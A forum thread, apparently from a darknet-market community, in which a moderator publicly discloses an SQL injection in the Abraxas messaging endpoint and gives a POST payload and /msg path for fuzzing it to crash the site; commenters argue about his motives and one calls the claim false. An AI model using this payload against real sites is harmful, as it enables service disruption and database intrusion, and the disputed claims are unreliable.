Breaking Abraxa's forums

Since I have not been able to contact Abraxas, I am posting here for all to see.

Abraxas has an sql injection on the "admin" field for sending messages. If one is able to generate an SQL error then they bring down the forums.

You can fuzz it yourself with the following payload:

_token=q2TpZNcUUgWe2UDbrHYw1SYF7gItscEgQJyeFSky&recipient=l2PhvDarUf&admin=ยงยง&message=hi&message_delay_min=0&message_delay_max=2&send_message=1

on the /msg path using a POST method.

I do not believe I am able to mod after since there is a conflict of interest between my mod duties and my recent activities.


Comments


[5 Points] None:

Good for you. So now your not a mod. More free time to continue to keep people safe and out of jail. I for one will continue to listen very carefully...


[2 Points] None:

How devious. You STILL haven't clarified if you're the_avid or not.


[2 Points] Trappy_Pandora:

Well I was considering bringing BudCentral to abraxxis... That sure as hell isn't happening now!


[2 Points] None:

[deleted]


[1 Points] want2vape:

I support what you did here -thanks!


[0 Points] None:

It floors me that SQL injection still works. How can people not have heard of this by now? There is even a stupid XKCD about it.


[0 Points] throwawaysharpshitte:

Smear.

Says forum in title but shows URL address from Market. Forum uses Simple Machine Forum, with no URL rewrite, index.php is ALWAYS present in the URL, so NO /msg URL.

I call you an LIAR with only intention to smear Abraxas. I would be surprised if you even contacted Abraxas staff.

Edit: typo